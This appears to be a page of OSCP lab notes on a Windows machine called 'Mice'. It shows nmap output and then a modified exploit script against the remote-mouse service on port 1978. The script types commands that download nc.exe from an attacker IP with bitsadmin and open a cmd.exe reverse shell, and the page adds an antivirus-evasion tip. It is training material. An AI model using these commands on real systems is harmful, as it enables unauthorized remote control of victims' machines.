O
O
OSCP Notes
Search
K
Comment on page

Mice (Windows)

1978/tcp open unisql?
| fingerprint-strings:
| DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RTSPRequest, SIPOptions, SSLSessionReq, TLSSessionReq, ms-sql-s:
|_ SIN 15win nop nop 300
1979/tcp open unisql-java?
1980/tcp open pearldoc-xact?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: REMOTE-PC
| NetBIOS_Domain_Name: REMOTE-PC
| NetBIOS_Computer_Name: REMOTE-PC
| DNS_Domain_Name: Remote-PC
| DNS_Computer_Name: Remote-PC
| Product_Version: 10.0.19041
|_ System_Time: 2022-05-18T16:19:09+00:00
|_ssl-date: 2022-05-18T16:19:37+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=Remote-PC
| Not valid before: 2022-05-17T00:09:34
|_Not valid after: 2022-11-16T00:09:34
7680/tcp open pando-pub?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1978-TCP:V=7.92%I=7%D=5/18%Time=62851BDD%P=x86_64-pc-linux-gnu%r(NU
SF:LL,15,"SIN\x2015win\x20nop\x20nop\x20300")%r(GenericLines,15,"SIN\x2015
SF:win\x20nop\x20nop\x20300")%r(GetRequest,15,"SIN\x2015win\x20nop\x20nop\
SF:x20300")%r(HTTPOptions,15,"SIN\x2015win\x20nop\x20nop\x20300")%r(RTSPRe
SF:quest,15,"SIN\x2015win\x20nop\x20nop\x20300")%r(DNSVersionBindReqTCP,15
SF:,"SIN\x2015win\x20nop\x20nop\x20300")%r(Help,15,"SIN\x2015win\x20nop\x2
SF:0nop\x20300")%r(SSLSessionReq,15,"SIN\x2015win\x20nop\x20nop\x20300")%r
SF:(TLSSessionReq,15,"SIN\x2015win\x20nop\x20nop\x20300")%r(FourOhFourRequ
SF:est,15,"SIN\x2015win\x20nop\x20nop\x20300")%r(LPDString,15,"SIN\x2015wi
SF:n\x20nop\x20nop\x20300")%r(LDAPSearchReq,15,"SIN\x2015win\x20nop\x20nop
SF:\x20300")%r(LDAPBindReq,15,"SIN\x2015win\x20nop\x20nop\x20300")%r(SIPOp
SF:tions,15,"SIN\x2015win\x20nop\x20nop\x20300")%r(LANDesk-RC,15,"SIN\x201
SF:5win\x20nop\x20nop\x20300")%r(JavaRMI,15,"SIN\x2015win\x20nop\x20nop\x2
SF:0300")%r(ms-sql-s,15,"SIN\x2015win\x20nop\x20nop\x20300");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
1978 has an exploit
Modify the script
cmd1='mkdir c:\\pwn'
cmd2='bitsadmin /transfer job /download /priority high http://192.168.49.183/nc.exe c:\\pwn\\nc.exe'
cmd3='c:\\pwn\\nc.exe -e cmd.exe 192.168.49.183 443'
def PopCalc(ip):
MoveMouse(-5000,3000,ip)
MousePress(mouse.leftClick,ip)
sleep(1)
SendString("cmd.exe",ip)
sleep(1)
SendString("\n",ip)
sleep(1)
SendString(cmd1,ip)
sleep(1)
SendString("\n",ip)
sleep(1)
SendString(cmd2,ip)
sleep(1)
SendString("\n",ip)
sleep(25)
SendString(cmd3,ip)
sleep(1)
SendString("\n",ip)
print("SUCCESS!",ip)
Now because of the antivirus setting, you need to host the file on an actual web server (apache) instead of the python web server or it won't work.